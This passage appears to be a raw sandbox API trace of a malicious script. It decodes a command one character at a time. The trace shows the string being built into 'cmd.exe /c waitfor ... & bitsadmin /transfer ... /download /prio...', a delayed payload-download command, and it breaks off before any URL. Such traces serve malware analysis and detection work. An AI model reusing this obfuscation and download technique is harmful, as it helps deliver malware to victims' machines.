dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.137] VarBstrCat (in: bstrLeft="for /t 5 YKERQ &", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0017.137] VarBstrCat (in: bstrLeft="for /t 5 YKERQ & ", bstrRight="b", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.137] VarBstrCat (in: bstrLeft="for /t 5 YKERQ & b", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.137] VarBstrCat (in: bstrLeft="for /t 5 YKERQ & bi", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] VarBstrCat (in: bstrLeft="cmd.exe /c \"wait", bstrRight="for /t 5 YKERQ & bit", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.137] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.137] VarBstrCat (in: bstrLeft=0x0, bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.137] VarBstrCat (in: bstrLeft="s", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.137] VarBstrCat (in: bstrLeft="sa", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sad", bstrRight="m", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadm", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmi", bstrRight="n", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin ", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin /", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin /t", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin /tr", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin /tra", bstrRight="n", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.138] VarBstrCat (in: bstrLeft="sadmin /tran", bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0017.139] VarBstrCat (in: bstrLeft="sadmin /trans", bstrRight="f", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.139] VarBstrCat (in: bstrLeft="sadmin /transf", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.139] VarBstrCat (in: bstrLeft="sadmin /transfe", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.139] VarBstrCat (in: bstrLeft="sadmin /transfer", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bit", bstrRight="sadmin /transfer ", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.139] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0017.139] VarBstrCat (in: bstrLeft=0x0, bstrRight="U", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer ", bstrRight="U", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.139] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf48, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0017.139] VarBstrCat (in: bstrLeft=0x0, bstrRight="K", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="H", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf48, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0017.139] VarBstrCat (in: bstrLeft="K", bstrRight="E", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797ba28, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0017.140] VarBstrCat (in: bstrLeft="KE", bstrRight="F", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf88, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.140] VarBstrCat (in: bstrLeft="KEF", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer U", bstrRight="KEF ", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.140] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf48, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.140] VarBstrCat (in: bstrLeft=0x0, bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf48, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.140] VarBstrCat (in: bstrLeft="/", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797ba28, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.140] VarBstrCat (in: bstrLeft="/d", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf88, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.140] VarBstrCat (in: bstrLeft="/do", bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf48, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.140] VarBstrCat (in: bstrLeft="/dow", bstrRight="n", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b758, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.140] VarBstrCat (in: bstrLeft="/down", bstrRight="l", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.140] VarBstrCat (in: bstrLeft="/downl", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.141] VarBstrCat (in: bstrLeft="/downlo", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF ", bstrRight="/downloa", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.141] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.141] VarBstrCat (in: bstrLeft=0x0, bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797ba28, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d ", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf88, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d /", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d /p", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d /pr", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d /pri", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, 